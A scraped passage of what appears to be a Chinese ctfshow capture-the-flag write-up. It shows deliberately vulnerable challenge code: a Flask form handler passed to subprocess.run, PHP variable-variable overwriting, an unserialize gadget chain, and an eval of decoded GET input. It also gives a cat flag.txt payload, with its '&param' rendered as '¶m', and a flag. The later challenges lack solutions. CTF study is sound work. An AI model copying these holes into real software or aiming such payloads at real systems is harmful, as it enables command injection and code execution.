from flask import request cmd: str = request.form.get('cmd') param: str = request.form.get('param') # ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓ import subprocess, os if cmd is not None and param is not None: try: tVar = subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5) print('Done!') except subprocess.TimeoutExpired: print('Timeout!') except: print('Error!') else: print('No Flag!')
发现传入两个参数cmd和param,会截取cmd的前三个字符当成命令run,param被当成参数。
所以直接构造cat flag.txt
payload:
1
cmd=cat¶m=flag.txt
ctfshow{7d9cfcf5-9314-4eb0-9240-d77a6ca6f29d}
遍地飘零
考点:$$值覆盖,$_GET全局变量和本地变量
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
<?php include "flag.php"; highlight_file(__FILE__);
$zeros="000000000000000000000000000000";
foreach($_GET as $key => $value){ $$key=$$value; }
if ($flag=="000000000000000000000000000000"){ echo "好多零"; }else{ echo "没有零,仔细看看输入有什么问题吧"; var_dump($_GET); }
<?php include "flag.php"; highlight_file(__FILE__);
class Moon{ public $name="月亮"; public function __toString(){ return $this->name; } public function __wakeup(){ echo "我是".$this->name."快来赏我"; } }
class Ion_Fan_Princess{ public $nickname="牛夫人";
public function call(){ global $flag; if ($this->nickname=="小甜甜"){ echo $flag; }else{ echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n"; echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n"; } } public function __toString(){ $this->call(); return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname; } }
if (isset($_GET['code'])){ unserialize($_GET['code']);
<?php header("Content-Type:text/html;charset=utf-8"); include 'lib.php'; if(!is_dir('./plugins/')){ @mkdir('./plugins/', 0777); } //Test it and delete it !!! //测试执行加密后的插件代码 if($_GET['action'] === 'test') { echo 'Anything is good?Please test it.'; @eval(decode($_GET['input'])); }